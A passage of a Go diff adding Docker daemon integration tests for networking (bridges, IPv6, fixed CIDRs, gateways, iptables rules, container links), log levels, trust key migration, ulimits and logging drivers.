is not running + runningOut, err := s.d.Cmd("inspect", "--format={{.State.Running}}", "top") + if err != nil { + c.Fatalf("Could not inspect on container: %s, %v", out, err) + } + if strings.TrimSpace(runningOut) != "true" { + c.Fatalf("Container should have been restarted after daemon restart. Status running should have been true but was: %q", strings.TrimSpace(runningOut)) + } + + // get output from iptables after restart + ipTablesCmd = exec.Command("iptables", "-nvL") + out, _, err = runCommandWithOutput(ipTablesCmd) + if err != nil { + c.Fatalf("Could not run iptables -nvL: %s, %v", out, err) + } + + if !strings.Contains(out, ipTablesSearchString) { + c.Fatalf("iptables output after restart should have contained %q, but was %q", ipTablesSearchString, out) + } +} + +// TestDaemonIPv6Enabled checks that when the daemon is started with --ipv6=true that the docker0 bridge +// has the fe80::1 address and that a container is assigned a link-local address +func (s *DockerDaemonSuite) TestDaemonIPv6Enabled(c *check.C) { + testRequires(c, IPv6) + + setupV6(c) + defer teardownV6(c) + + if err := s.d.StartWithBusybox("--ipv6"); err != nil { + c.Fatal(err) + } + + iface, err := net.InterfaceByName("docker0") + if err != nil { + c.Fatalf("Error getting docker0 interface: %v", err) + } + + addrs, err := iface.Addrs() + if err != nil { + c.Fatalf("Error getting addresses for docker0 interface: %v", err) + } + + var found bool + expected := "fe80::1/64" + + for i := range addrs { + if addrs[i].String() == expected { + found = true + break + } + } + + if !found { + c.Fatalf("Bridge does not have an IPv6 Address") + } + + if out, err := s.d.Cmd("run", "-itd", "--name=ipv6test", "busybox:latest"); err != nil { + c.Fatalf("Could not run container: %s, %v", out, err) + } + + out, err := s.d.Cmd("inspect", "--format", "'{{.NetworkSettings.Networks.bridge.LinkLocalIPv6Address}}'", "ipv6test") + out = strings.Trim(out, " \r\n'") + + if err != nil { + c.Fatalf("Error inspecting container: %s, %v", out, err) + } + + if ip := net.ParseIP(out); ip == nil { + c.Fatalf("Container should have a link-local IPv6 address") + } + + out, err = s.d.Cmd("inspect", "--format", "'{{.NetworkSettings.Networks.bridge.GlobalIPv6Address}}'", "ipv6test") + out = strings.Trim(out, " \r\n'") + + if err != nil { + c.Fatalf("Error inspecting container: %s, %v", out, err) + } + + if ip := net.ParseIP(out); ip != nil { + c.Fatalf("Container should not have a global IPv6 address: %v", out) + } +} + +// TestDaemonIPv6FixedCIDR checks that when the daemon is started with --ipv6=true and a fixed CIDR +// that running containers are given a link-local and global IPv6 address +func (s *DockerDaemonSuite) TestDaemonIPv6FixedCIDR(c *check.C) { + // IPv6 setup is messing with local bridge address. + testRequires(c, SameHostDaemon) + setupV6(c) + defer teardownV6(c) + + err := s.d.StartWithBusybox("--ipv6", "--fixed-cidr-v6=2001:db8:2::/64", "--default-gateway-v6=2001:db8:2::100") + c.Assert(err, checker.IsNil, check.Commentf("Could not start daemon with busybox: %v", err)) + + out, err := s.d.Cmd("run", "-itd", "--name=ipv6test", "busybox:latest") + c.Assert(err, checker.IsNil, check.Commentf("Could not run container: %s, %v", out, err)) + + out, err = s.d.Cmd("inspect", "--format", "{{.NetworkSettings.Networks.bridge.GlobalIPv6Address}}", "ipv6test") + out = strings.Trim(out, " \r\n'") + + c.Assert(err, checker.IsNil, check.Commentf(out)) + + ip := net.ParseIP(out) + c.Assert(ip, checker.NotNil, check.Commentf("Container should have a global IPv6 address")) + + out, err = s.d.Cmd("inspect", "--format", "{{.NetworkSettings.Networks.bridge.IPv6Gateway}}", "ipv6test") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + c.Assert(strings.Trim(out, " \r\n'"), checker.Equals, "2001:db8:2::100", check.Commentf("Container should have a global IPv6 gateway")) +} + +// TestDaemonIPv6FixedCIDRAndMac checks that when the daemon is started with ipv6 fixed CIDR +// the running containers are given an IPv6 address derived from the MAC address and the ipv6 fixed CIDR +func (s *DockerDaemonSuite) TestDaemonIPv6FixedCIDRAndMac(c *check.C) { + // IPv6 setup is messing with local bridge address. + testRequires(c, SameHostDaemon) + setupV6(c) + defer teardownV6(c) + + err := s.d.StartWithBusybox("--ipv6", "--fixed-cidr-v6=2001:db8:1::/64") + c.Assert(err, checker.IsNil) + + out, err := s.d.Cmd("run", "-itd", "--name=ipv6test", "--mac-address", "AA:BB:CC:DD:EE:FF", "busybox") + c.Assert(err, checker.IsNil) + + out, err = s.d.Cmd("inspect", "--format", "{{.NetworkSettings.Networks.bridge.GlobalIPv6Address}}", "ipv6test") + c.Assert(err, checker.IsNil) + c.Assert(strings.Trim(out, " \r\n'"), checker.Equals, "2001:db8:1::aabb:ccdd:eeff") +} + +func (s *DockerDaemonSuite) TestDaemonLogLevelWrong(c *check.C) { + c.Assert(s.d.Start("--log-level=bogus"), check.NotNil, check.Commentf("Daemon shouldn't start with wrong log level")) +} + +func (s *DockerDaemonSuite) TestDaemonLogLevelDebug(c *check.C) { + if err := s.d.Start("--log-level=debug"); err != nil { + c.Fatal(err) + } + content, _ := ioutil.ReadFile(s.d.logFile.Name()) + if !strings.Contains(string(content), `level=debug`) { + c.Fatalf(`Missing level="debug" in log file:\n%s`, string(content)) + } +} + +func (s *DockerDaemonSuite) TestDaemonLogLevelFatal(c *check.C) { + // we creating new daemons to create new logFile + if err := s.d.Start("--log-level=fatal"); err != nil { + c.Fatal(err) + } + content, _ := ioutil.ReadFile(s.d.logFile.Name()) + if strings.Contains(string(content), `level=debug`) { + c.Fatalf(`Should not have level="debug" in log file:\n%s`, string(content)) + } +} + +func (s *DockerDaemonSuite) TestDaemonFlagD(c *check.C) { + if err := s.d.Start("-D"); err != nil { + c.Fatal(err) + } + content, _ := ioutil.ReadFile(s.d.logFile.Name()) + if !strings.Contains(string(content), `level=debug`) { + c.Fatalf(`Should have level="debug" in log file using -D:\n%s`, string(content)) + } +} + +func (s *DockerDaemonSuite) TestDaemonFlagDebug(c *check.C) { + if err := s.d.Start("--debug"); err != nil { + c.Fatal(err) + } + content, _ := ioutil.ReadFile(s.d.logFile.Name()) + if !strings.Contains(string(content), `level=debug`) { + c.Fatalf(`Should have level="debug" in log file using --debug:\n%s`, string(content)) + } +} + +func (s *DockerDaemonSuite) TestDaemonFlagDebugLogLevelFatal(c *check.C) { + if err := s.d.Start("--debug", "--log-level=fatal"); err != nil { + c.Fatal(err) + } + content, _ := ioutil.ReadFile(s.d.logFile.Name()) + if !strings.Contains(string(content), `level=debug`) { + c.Fatalf(`Should have level="debug" in log file when using both --debug and --log-level=fatal:\n%s`, string(content)) + } +} + +func (s *DockerDaemonSuite) TestDaemonAllocatesListeningPort(c *check.C) { + listeningPorts := [][]string{ + {"0.0.0.0", "0.0.0.0", "5678"}, + {"127.0.0.1", "127.0.0.1", "1234"}, + {"localhost", "127.0.0.1", "1235"}, + } + + cmdArgs := make([]string, 0, len(listeningPorts)*2) + for _, hostDirective := range listeningPorts { + cmdArgs = append(cmdArgs, "--host", fmt.Sprintf("tcp://%s:%s", hostDirective[0], hostDirective[2])) + } + + if err := s.d.StartWithBusybox(cmdArgs...); err != nil { + c.Fatalf("Could not start daemon with busybox: %v", err) + } + + for _, hostDirective := range listeningPorts { + output, err := s.d.Cmd("run", "-p", fmt.Sprintf("%s:%s:80", hostDirective[1], hostDirective[2]), "busybox", "true") + if err == nil { + c.Fatalf("Container should not start, expected port already allocated error: %q", output) + } else if !strings.Contains(output, "port is already allocated") { + c.Fatalf("Expected port is already allocated error: %q", output) + } + } +} + +func (s *DockerDaemonSuite) TestDaemonKeyGeneration(c *check.C) { + // TODO: skip or update for Windows daemon + os.Remove("/etc/docker/key.json") + if err := s.d.Start(); err != nil { + c.Fatalf("Could not start daemon: %v", err) + } + s.d.Stop() + + k, err := libtrust.LoadKeyFile("/etc/docker/key.json") + if err != nil { + c.Fatalf("Error opening key file") + } + kid := k.KeyID() + // Test Key ID is a valid fingerprint (e.g. QQXN:JY5W:TBXI:MK3X:GX6P:PD5D:F56N:NHCS:LVRZ:JA46:R24J:XEFF) + if len(kid) != 59 { + c.Fatalf("Bad key ID: %s", kid) + } +} + +func (s *DockerDaemonSuite) TestDaemonKeyMigration(c *check.C) { + // TODO: skip or update for Windows daemon + os.Remove("/etc/docker/key.json") + k1, err := libtrust.GenerateECP256PrivateKey() + if err != nil { + c.Fatalf("Error generating private key: %s", err) + } + if err := os.MkdirAll(filepath.Join(os.Getenv("HOME"), ".docker"), 0755); err != nil { + c.Fatalf("Error creating .docker directory: %s", err) + } + if err := libtrust.SaveKey(filepath.Join(os.Getenv("HOME"), ".docker", "key.json"), k1); err != nil { + c.Fatalf("Error saving private key: %s", err) + } + + if err := s.d.Start(); err != nil { + c.Fatalf("Could not start daemon: %v", err) + } + s.d.Stop() + + k2, err := libtrust.LoadKeyFile("/etc/docker/key.json") + if err != nil { + c.Fatalf("Error opening key file") + } + if k1.KeyID() != k2.KeyID() { + c.Fatalf("Key not migrated") + } +} + +// GH#11320 - verify that the daemon exits on failure properly +// Note that this explicitly tests the conflict of {-b,--bridge} and {--bip} options as the means +// to get a daemon init failure; no other tests for -b/--bip conflict are therefore required +func (s *DockerDaemonSuite) TestDaemonExitOnFailure(c *check.C) { + //attempt to start daemon with incorrect flags (we know -b and --bip conflict) + if err := s.d.Start("--bridge", "nosuchbridge", "--bip", "1.1.1.1"); err != nil { + //verify we got the right error + if !strings.Contains(err.Error(), "Daemon exited") { + c.Fatalf("Expected daemon not to start, got %v", err) + } + // look in the log and make sure we got the message that daemon is shutting down + runCmd := exec.Command("grep", "Error starting daemon", s.d.LogFileName()) + if out, _, err := runCommandWithOutput(runCmd); err != nil { + c.Fatalf("Expected 'Error starting daemon' message; but doesn't exist in log: %q, err: %v", out, err) + } + } else { + //if we didn't get an error and the daemon is running, this is a failure + c.Fatal("Conflicting options should cause the daemon to error out with a failure") + } +} + +func (s *DockerDaemonSuite) TestDaemonBridgeExternal(c *check.C) { + d := s.d + err := d.Start("--bridge", "nosuchbridge") + c.Assert(err, check.NotNil, check.Commentf("--bridge option with an invalid bridge should cause the daemon to fail")) + defer d.Restart() + + bridgeName := "external-bridge" + bridgeIP := "192.169.1.1/24" + _, bridgeIPNet, _ := net.ParseCIDR(bridgeIP) + + out, err := createInterface(c, "bridge", bridgeName, bridgeIP) + c.Assert(err, check.IsNil, check.Commentf(out)) + defer deleteInterface(c, bridgeName) + + err = d.StartWithBusybox("--bridge", bridgeName) + c.Assert(err, check.IsNil) + + ipTablesSearchString := bridgeIPNet.String() + ipTablesCmd := exec.Command("iptables", "-t", "nat", "-nvL") + out, _, err = runCommandWithOutput(ipTablesCmd) + c.Assert(err, check.IsNil) + + c.Assert(strings.Contains(out, ipTablesSearchString), check.Equals, true, + check.Commentf("iptables output should have contained %q, but was %q", + ipTablesSearchString, out)) + + _, err = d.Cmd("run", "-d", "--name", "ExtContainer", "busybox", "top") + c.Assert(err, check.IsNil) + + containerIP := d.findContainerIP("ExtContainer") + ip := net.ParseIP(containerIP) + c.Assert(bridgeIPNet.Contains(ip), check.Equals, true, + check.Commentf("Container IP-Address must be in the same subnet range : %s", + containerIP)) +} + +func (s *DockerDaemonSuite) TestDaemonBridgeNone(c *check.C) { + // start with bridge none + d := s.d + err := d.StartWithBusybox("--bridge", "none") + c.Assert(err, check.IsNil) + defer d.Restart() + + // verify docker0 iface is not there + out, _, err := runCommandWithOutput(exec.Command("ifconfig", "docker0")) + c.Assert(err, check.NotNil, check.Commentf("docker0 should not be present if daemon started with --bridge=none")) + c.Assert(strings.Contains(out, "Device not found"), check.Equals, true) + + // verify default "bridge" network is not there + out, err = d.Cmd("network", "inspect", "bridge") + c.Assert(err, check.NotNil, check.Commentf("\"bridge\" network should not be present if daemon started with --bridge=none")) + c.Assert(strings.Contains(out, "No such network"), check.Equals, true) +} + +func createInterface(c *check.C, ifType string, ifName string, ipNet string) (string, error) { + args := []string{"link", "add", "name", ifName, "type", ifType} + ipLinkCmd := exec.Command("ip", args...) + out, _, err := runCommandWithOutput(ipLinkCmd) + if err != nil { + return out, err + } + + ifCfgCmd := exec.Command("ifconfig", ifName, ipNet, "up") + out, _, err = runCommandWithOutput(ifCfgCmd) + return out, err +} + +func deleteInterface(c *check.C, ifName string) { + ifCmd := exec.Command("ip", "link", "delete", ifName) + out, _, err := runCommandWithOutput(ifCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) + + flushCmd := exec.Command("iptables", "-t", "nat", "--flush") + out, _, err = runCommandWithOutput(flushCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) + + flushCmd = exec.Command("iptables", "--flush") + out, _, err = runCommandWithOutput(flushCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) +} + +func (s *DockerDaemonSuite) TestDaemonBridgeIP(c *check.C) { + // TestDaemonBridgeIP Steps + // 1. Delete the existing docker0 Bridge + // 2. Set --bip daemon configuration and start the new Docker Daemon + // 3. Check if the bip config has taken effect using ifconfig and iptables commands + // 4. Launch a Container and make sure the IP-Address is in the expected subnet + // 5. Delete the docker0 Bridge + // 6. Restart the Docker Daemon (via deferred action) + // This Restart takes care of bringing docker0 interface back to auto-assigned IP + + defaultNetworkBridge := "docker0" + deleteInterface(c, defaultNetworkBridge) + + d := s.d + + bridgeIP := "192.169.1.1/24" + ip, bridgeIPNet, _ := net.ParseCIDR(bridgeIP) + + err := d.StartWithBusybox("--bip", bridgeIP) + c.Assert(err, check.IsNil) + defer d.Restart() + + ifconfigSearchString := ip.String() + ifconfigCmd := exec.Command("ifconfig", defaultNetworkBridge) + out, _, _, err := runCommandWithStdoutStderr(ifconfigCmd) + c.Assert(err, check.IsNil) + + c.Assert(strings.Contains(out, ifconfigSearchString), check.Equals, true, + check.Commentf("ifconfig output should have contained %q, but was %q", + ifconfigSearchString, out)) + + ipTablesSearchString := bridgeIPNet.String() + ipTablesCmd := exec.Command("iptables", "-t", "nat", "-nvL") + out, _, err = runCommandWithOutput(ipTablesCmd) + c.Assert(err, check.IsNil) + + c.Assert(strings.Contains(out, ipTablesSearchString), check.Equals, true, + check.Commentf("iptables output should have contained %q, but was %q", + ipTablesSearchString, out)) + + out, err = d.Cmd("run", "-d", "--name", "test", "busybox", "top") + c.Assert(err, check.IsNil) + + containerIP := d.findContainerIP("test") + ip = net.ParseIP(containerIP) + c.Assert(bridgeIPNet.Contains(ip), check.Equals, true, + check.Commentf("Container IP-Address must be in the same subnet range : %s", + containerIP)) + deleteInterface(c, defaultNetworkBridge) +} + +func (s *DockerDaemonSuite) TestDaemonRestartWithBridgeIPChange(c *check.C) { + if err := s.d.Start(); err != nil { + c.Fatalf("Could not start daemon: %v", err) + } + defer s.d.Restart() + if err := s.d.Stop(); err != nil { + c.Fatalf("Could not stop daemon: %v", err) + } + + // now we will change the docker0's IP and then try starting the daemon + bridgeIP := "192.169.100.1/24" + _, bridgeIPNet, _ := net.ParseCIDR(bridgeIP) + + ipCmd := exec.Command("ifconfig", "docker0", bridgeIP) + stdout, stderr, _, err := runCommandWithStdoutStderr(ipCmd) + if err != nil { + c.Fatalf("failed to change docker0's IP association: %v, stdout: %q, stderr: %q", err, stdout, stderr) + } + + if err := s.d.Start("--bip", bridgeIP); err != nil { + c.Fatalf("Could not start daemon: %v", err) + } + + //check if the iptables contains new bridgeIP MASQUERADE rule + ipTablesSearchString := bridgeIPNet.String() + ipTablesCmd := exec.Command("iptables", "-t", "nat", "-nvL") + out, _, err := runCommandWithOutput(ipTablesCmd) + if err != nil { + c.Fatalf("Could not run iptables -nvL: %s, %v", out, err) + } + if !strings.Contains(out, ipTablesSearchString) { + c.Fatalf("iptables output should have contained new MASQUERADE rule with IP %q, but was %q", ipTablesSearchString, out) + } +} + +func (s *DockerDaemonSuite) TestDaemonBridgeFixedCidr(c *check.C) { + d := s.d + + bridgeName := "external-bridge" + bridgeIP := "192.169.1.1/24" + + out, err := createInterface(c, "bridge", bridgeName, bridgeIP) + c.Assert(err, check.IsNil, check.Commentf(out)) + defer deleteInterface(c, bridgeName) + + args := []string{"--bridge", bridgeName, "--fixed-cidr", "192.169.1.0/30"} + err = d.StartWithBusybox(args...) + c.Assert(err, check.IsNil) + defer d.Restart() + + for i := 0; i < 4; i++ { + cName := "Container" + strconv.Itoa(i) + out, err := d.Cmd("run", "-d", "--name", cName, "busybox", "top") + if err != nil { + c.Assert(strings.Contains(out, "no available IPv4 addresses"), check.Equals, true, + check.Commentf("Could not run a Container : %s %s", err.Error(), out)) + } + } +} + +func (s *DockerDaemonSuite) TestDaemonBridgeFixedCidr2(c *check.C) { + d := s.d + + bridgeName := "external-bridge" + bridgeIP := "10.2.2.1/16" + + out, err := createInterface(c, "bridge", bridgeName, bridgeIP) + c.Assert(err, check.IsNil, check.Commentf(out)) + defer deleteInterface(c, bridgeName) + + err = d.StartWithBusybox("--bip", bridgeIP, "--fixed-cidr", "10.2.2.0/24") + c.Assert(err, check.IsNil) + defer s.d.Restart() + + out, err = d.Cmd("run", "-d", "--name", "bb", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + defer d.Cmd("stop", "bb") + + out, err = d.Cmd("exec", "bb", "/bin/sh", "-c", "ifconfig eth0 | awk '/inet addr/{print substr($2,6)}'") + c.Assert(out, checker.Equals, "10.2.2.0\n") + + out, err = d.Cmd("run", "--rm", "busybox", "/bin/sh", "-c", "ifconfig eth0 | awk '/inet addr/{print substr($2,6)}'") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(out, checker.Equals, "10.2.2.2\n") +} + +func (s *DockerDaemonSuite) TestDaemonBridgeFixedCIDREqualBridgeNetwork(c *check.C) { + d := s.d + + bridgeName := "external-bridge" + bridgeIP := "172.27.42.1/16" + + out, err := createInterface(c, "bridge", bridgeName, bridgeIP) + c.Assert(err, check.IsNil, check.Commentf(out)) + defer deleteInterface(c, bridgeName) + + err = d.StartWithBusybox("--bridge", bridgeName, "--fixed-cidr", bridgeIP) + c.Assert(err, check.IsNil) + defer s.d.Restart() + + out, err = d.Cmd("run", "-d", "busybox", "top") + c.Assert(err, check.IsNil, check.Commentf(out)) + cid1 := strings.TrimSpace(out) + defer d.Cmd("stop", cid1) +} + +func (s *DockerDaemonSuite) TestDaemonDefaultGatewayIPv4Implicit(c *check.C) { + defaultNetworkBridge := "docker0" + deleteInterface(c, defaultNetworkBridge) + + d := s.d + + bridgeIP := "192.169.1.1" + bridgeIPNet := fmt.Sprintf("%s/24", bridgeIP) + + err := d.StartWithBusybox("--bip", bridgeIPNet) + c.Assert(err, check.IsNil) + defer d.Restart() + + expectedMessage := fmt.Sprintf("default via %s dev", bridgeIP) + out, err := d.Cmd("run", "busybox", "ip", "-4", "route", "list", "0/0") + c.Assert(strings.Contains(out, expectedMessage), check.Equals, true, + check.Commentf("Implicit default gateway should be bridge IP %s, but default route was '%s'", + bridgeIP, strings.TrimSpace(out))) + deleteInterface(c, defaultNetworkBridge) +} + +func (s *DockerDaemonSuite) TestDaemonDefaultGatewayIPv4Explicit(c *check.C) { + defaultNetworkBridge := "docker0" + deleteInterface(c, defaultNetworkBridge) + + d := s.d + + bridgeIP := "192.169.1.1" + bridgeIPNet := fmt.Sprintf("%s/24", bridgeIP) + gatewayIP := "192.169.1.254" + + err := d.StartWithBusybox("--bip", bridgeIPNet, "--default-gateway", gatewayIP) + c.Assert(err, check.IsNil) + defer d.Restart() + + expectedMessage := fmt.Sprintf("default via %s dev", gatewayIP) + out, err := d.Cmd("run", "busybox", "ip", "-4", "route", "list", "0/0") + c.Assert(strings.Contains(out, expectedMessage), check.Equals, true, + check.Commentf("Explicit default gateway should be %s, but default route was '%s'", + gatewayIP, strings.TrimSpace(out))) + deleteInterface(c, defaultNetworkBridge) +} + +func (s *DockerDaemonSuite) TestDaemonDefaultGatewayIPv4ExplicitOutsideContainerSubnet(c *check.C) { + defaultNetworkBridge := "docker0" + deleteInterface(c, defaultNetworkBridge) + + // Program a custom default gateway outside of the container subnet, daemon should accept it and start + err := s.d.StartWithBusybox("--bip", "172.16.0.10/16", "--fixed-cidr", "172.16.1.0/24", "--default-gateway", "172.16.0.254") + c.Assert(err, check.IsNil) + + deleteInterface(c, defaultNetworkBridge) + s.d.Restart() +} + +func (s *DockerDaemonSuite) TestDaemonDefaultNetworkInvalidClusterConfig(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + + // Start daemon without docker0 bridge + defaultNetworkBridge := "docker0" + deleteInterface(c, defaultNetworkBridge) + + discoveryBackend := "consul://consuladdr:consulport/some/path" + err := s.d.Start(fmt.Sprintf("--cluster-store=%s", discoveryBackend)) + c.Assert(err, checker.IsNil) + + // Start daemon with docker0 bridge + result := icmd.RunCommand("ifconfig", defaultNetworkBridge) + c.Assert(result, icmd.Matches, icmd.Success) + + err = s.d.Restart(fmt.Sprintf("--cluster-store=%s", discoveryBackend)) + c.Assert(err, checker.IsNil) +} + +func (s *DockerDaemonSuite) TestDaemonIP(c *check.C) { + d := s.d + + ipStr := "192.170.1.1/24" + ip, _, _ := net.ParseCIDR(ipStr) + args := []string{"--ip", ip.String()} + err := d.StartWithBusybox(args...) + c.Assert(err, check.IsNil) + defer d.Restart() + + out, err := d.Cmd("run", "-d", "-p", "8000:8000", "busybox", "top") + c.Assert(err, check.NotNil, + check.Commentf("Running a container must fail with an invalid --ip option")) + c.Assert(strings.Contains(out, "Error starting userland proxy"), check.Equals, true) + + ifName := "dummy" + out, err = createInterface(c, "dummy", ifName, ipStr) + c.Assert(err, check.IsNil, check.Commentf(out)) + defer deleteInterface(c, ifName) + + _, err = d.Cmd("run", "-d", "-p", "8000:8000", "busybox", "top") + c.Assert(err, check.IsNil) + + ipTablesCmd := exec.Command("iptables", "-t", "nat", "-nvL") + out, _, err = runCommandWithOutput(ipTablesCmd) + c.Assert(err, check.IsNil) + + regex := fmt.Sprintf("DNAT.*%s.*dpt:8000", ip.String()) + matched, _ := regexp.MatchString(regex, out) + c.Assert(matched, check.Equals, true, + check.Commentf("iptables output should have contained %q, but was %q", regex, out)) +} + +func (s *DockerDaemonSuite) TestDaemonICCPing(c *check.C) { + testRequires(c, bridgeNfIptables) + d := s.d + + bridgeName := "external-bridge" + bridgeIP := "192.169.1.1/24" + + out, err := createInterface(c, "bridge", bridgeName, bridgeIP) + c.Assert(err, check.IsNil, check.Commentf(out)) + defer deleteInterface(c, bridgeName) + + args := []string{"--bridge", bridgeName, "--icc=false"} + err = d.StartWithBusybox(args...) + c.Assert(err, check.IsNil) + defer d.Restart() + + ipTablesCmd := exec.Command("iptables", "-nvL", "FORWARD") + out, _, err = runCommandWithOutput(ipTablesCmd) + c.Assert(err, check.IsNil) + + regex := fmt.Sprintf("DROP.*all.*%s.*%s", bridgeName, bridgeName) + matched, _ := regexp.MatchString(regex, out) + c.Assert(matched, check.Equals, true, + check.Commentf("iptables output should have contained %q, but was %q", regex, out)) + + // Pinging another container must fail with --icc=false + pingContainers(c, d, true) + + ipStr := "192.171.1.1/24" + ip, _, _ := net.ParseCIDR(ipStr) + ifName := "icc-dummy" + + createInterface(c, "dummy", ifName, ipStr) + + // But, Pinging external or a Host interface must succeed + pingCmd := fmt.Sprintf("ping -c 1 %s -W 1", ip.String()) + runArgs := []string{"run", "--rm", "busybox", "sh", "-c", pingCmd} + _, err = d.Cmd(runArgs...) + c.Assert(err, check.IsNil) +} + +func (s *DockerDaemonSuite) TestDaemonICCLinkExpose(c *check.C) { + d := s.d + + bridgeName := "external-bridge" + bridgeIP := "192.169.1.1/24" + + out, err := createInterface(c, "bridge", bridgeName, bridgeIP) + c.Assert(err, check.IsNil, check.Commentf(out)) + defer deleteInterface(c, bridgeName) + + args := []string{"--bridge", bridgeName, "--icc=false"} + err = d.StartWithBusybox(args...) + c.Assert(err, check.IsNil) + defer d.Restart() + + ipTablesCmd := exec.Command("iptables", "-nvL", "FORWARD") + out, _, err = runCommandWithOutput(ipTablesCmd) + c.Assert(err, check.IsNil) + + regex := fmt.Sprintf("DROP.*all.*%s.*%s", bridgeName, bridgeName) + matched, _ := regexp.MatchString(regex, out) + c.Assert(matched, check.Equals, true, + check.Commentf("iptables output should have contained %q, but was %q", regex, out)) + + out, err = d.Cmd("run", "-d", "--expose", "4567", "--name", "icc1", "busybox", "nc", "-l", "-p", "4567") + c.Assert(err, check.IsNil, check.Commentf(out)) + + out, err = d.Cmd("run", "--link", "icc1:icc1", "busybox", "nc", "icc1", "4567") + c.Assert(err, check.IsNil, check.Commentf(out)) +} + +func (s *DockerDaemonSuite) TestDaemonLinksIpTablesRulesWhenLinkAndUnlink(c *check.C) { + bridgeName := "external-bridge" + bridgeIP := "192.169.1.1/24" + + out, err := createInterface(c, "bridge", bridgeName, bridgeIP) + c.Assert(err, check.IsNil, check.Commentf(out)) + defer deleteInterface(c, bridgeName) + + err = s.d.StartWithBusybox("--bridge", bridgeName, "--icc=false") + c.Assert(err, check.IsNil) + defer s.d.Restart() + + _, err = s.d.Cmd("run", "-d", "--name", "child", "--publish", "8080:80", "busybox", "top") + c.Assert(err, check.IsNil) + _, err = s.d.Cmd("run", "-d", "--name", "parent", "--link", "child:http", "busybox", "top") + c.Assert(err, check.IsNil) + + childIP := s.d.findContainerIP("child") + parentIP := s.d.findContainerIP("parent") + + sourceRule := []string{"-i", bridgeName, "-o", bridgeName, "-p", "tcp", "-s", childIP, "--sport", "80", "-d", parentIP, "-j", "ACCEPT"} + destinationRule := []string{"-i", bridgeName, "-o", bridgeName, "-p", "tcp", "-s", parentIP, "--dport", "80", "-d", childIP, "-j", "ACCEPT"} + if !iptables.Exists("filter", "DOCKER", sourceRule...) || !iptables.Exists("filter", "DOCKER", destinationRule...) { + c.Fatal("Iptables rules not found") + } + + s.d.Cmd("rm", "--link", "parent/http") + if iptables.Exists("filter", "DOCKER", sourceRule...) || iptables.Exists("filter", "DOCKER", destinationRule...) { + c.Fatal("Iptables rules should be removed when unlink") + } + + s.d.Cmd("kill", "child") + s.d.Cmd("kill", "parent") +} + +func (s *DockerDaemonSuite) TestDaemonUlimitDefaults(c *check.C) { + testRequires(c, DaemonIsLinux) + + if err := s.d.StartWithBusybox("--default-ulimit", "nofile=42:42", "--default-ulimit", "nproc=1024:1024"); err != nil { + c.Fatal(err) + } + + out, err := s.d.Cmd("run", "--ulimit", "nproc=2048", "--name=test", "busybox", "/bin/sh", "-c", "echo $(ulimit -n); echo $(ulimit -p)") + if err != nil { + c.Fatal(out, err) + } + + outArr := strings.Split(out, "\n") + if len(outArr) < 2 { + c.Fatalf("got unexpected output: %s", out) + } + nofile := strings.TrimSpace(outArr[0]) + nproc := strings.TrimSpace(outArr[1]) + + if nofile != "42" { + c.Fatalf("expected `ulimit -n` to be `42`, got: %s", nofile) + } + if nproc != "2048" { + c.Fatalf("exepcted `ulimit -p` to be 2048, got: %s", nproc) + } + + // Now restart daemon with a new default + if err := s.d.Restart("--default-ulimit", "nofile=43"); err != nil { + c.Fatal(err) + } + + out, err = s.d.Cmd("start", "-a", "test") + if err != nil { + c.Fatal(err) + } + + outArr = strings.Split(out, "\n") + if len(outArr) < 2 { + c.Fatalf("got unexpected output: %s", out) + } + nofile = strings.TrimSpace(outArr[0]) + nproc = strings.TrimSpace(outArr[1]) + + if nofile != "43" { + c.Fatalf("expected `ulimit -n` to be `43`, got: %s", nofile) + } + if nproc != "2048" { + c.Fatalf("exepcted `ulimit -p` to be 2048, got: %s", nproc) + } +} + +// #11315 +func (s *DockerDaemonSuite) TestDaemonRestartRenameContainer(c *check.C) { + if err := s.d.StartWithBusybox(); err != nil { + c.Fatal(err) + } + + if out, err := s.d.Cmd("run", "--name=test", "busybox"); err != nil { + c.Fatal(err, out) + } + + if out, err := s.d.Cmd("rename", "test", "test2"); err != nil { + c.Fatal(err, out) + } + + if err := s.d.Restart(); err != nil { + c.Fatal(err) + } + + if out, err := s.d.Cmd("start", "test2"); err != nil { + c.Fatal(err, out) + } +} + +func (s *DockerDaemonSuite) TestDaemonLoggingDriverDefault(c *check.C) { + if err := s.d.StartWithBusybox(); err != nil { + c.Fatal(err) + } + + out, err := s.d.Cmd("run", "--name=test", "busybox", "echo", "testline") + c.Assert(err, check.IsNil, check.Commentf(out)) + id, err := s.d.getIDByName("test") + c.Assert(err, check.IsNil) + + logPath := filepath.Join(s.d.root, "containers", id, id+"-json.log") + + if _, err := os.Stat(logPath); err != nil { + c.Fatal(err) + } + f, err := os.Open(logPath) + if err != nil { + c.Fatal(err) + } + defer f.Close() + + var res struct { + Log string `json:"log"` + Stream string `json:"stream"` + Time time.Time `json:"time"` + } + if err := json.NewDecoder(f).Decode(&res); err != nil { + c.Fatal(err) + } + if res.Log != "testline\n" { + c.Fatalf("Unexpected log line: %q, expected: %q", res.Log, "testline\n") + } + if res.Stream != "stdout" { + c.Fatalf("Unexpected stream: %q, expected: %q", res.Stream, "stdout") + } + if !time.Now().After(res.Time) { + c.Fatalf("Log time %v in future", res.Time) + } +} + +func (s *DockerDaemonSuite) TestDaemonLoggingDriverDefaultOverride(c *check.C) { + if err := s.d.StartWithBusybox(); err != nil { + c.Fatal(err) + } + + out, err := s.d.Cmd("run", "--name=test", "--log-driver=none", "busybox", "echo", "testline") + if err != nil { + c.Fatal(out, err) + } + id, err := s.d.getIDByName("test") + c.Assert(err, check.IsNil) + + logPath := filepath.Join(s.d.root, "containers", id, id+"-json.log") + + if _, err := os.Stat(logPath); err == nil || !os.IsNotExist(err) { + c.Fatalf("%s shouldn't exits, error on Stat: %s", logPath, err) + } +} + +func (s *DockerDaemonSuite) TestDaemonLoggingDriverNone(c *check.C) { + if err := s.d.StartWithBusybox("--log-driver=none"); err != nil { + c.Fatal(err) + } + + out, err := s.d.Cmd("run", "--name=test", "busybox", "echo", "testline") + if err != nil { + c.Fatal(out, err) + } + id, err := s.d.getIDByName("test") + c.Assert(err, check.IsNil) + + logPath := filepath.Join(s.d.folder, "graph", "containers", id, id+"-json.log") + + if _, err := os.Stat(logPath); err == nil || !os.IsNotExist(err) { + 